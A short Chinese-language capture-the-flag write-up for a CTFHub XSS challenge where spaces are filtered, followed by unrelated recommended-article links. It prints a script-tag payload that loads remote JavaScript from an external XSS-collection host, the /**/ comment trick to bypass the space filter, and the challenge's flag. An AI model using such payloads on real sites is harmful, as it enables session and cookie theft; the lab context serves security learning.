CTFHUB技能树之XSS——过滤空格

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题


在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理


用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
hello 早上好2 分钟前
05_Java 类加载过程
java·开发语言
echoVic15 分钟前
多模型支持的架构设计:如何集成 10+ AI 模型
java·javascript
橙露17 分钟前
Java并发编程进阶:线程池原理、参数配置与死锁避免实战
java·开发语言
程序员Agions19 分钟前
useMemo、useCallback、React.memo,可能真的要删了
前端·react.js
echoVic19 分钟前
AI Agent 安全权限设计:blade-code 的 5 种权限模式与三级控制
java·javascript
PPPPickup21 分钟前
easymall---图片上传以及图片展示
java
滕青山21 分钟前
Vue项目BMI计算器技术实现
前端·vue.js
历程里程碑24 分钟前
Linux 库
java·linux·运维·服务器·数据结构·c++·算法
Wpa.wk24 分钟前
接口自动化 - 接口鉴权处理常用方法
java·运维·测试工具·自动化·接口自动化
子兮曰25 分钟前
深入浏览器指纹:Canvas、WebGL、Audio是如何暴露你的身份的?
前端·浏览器·canvas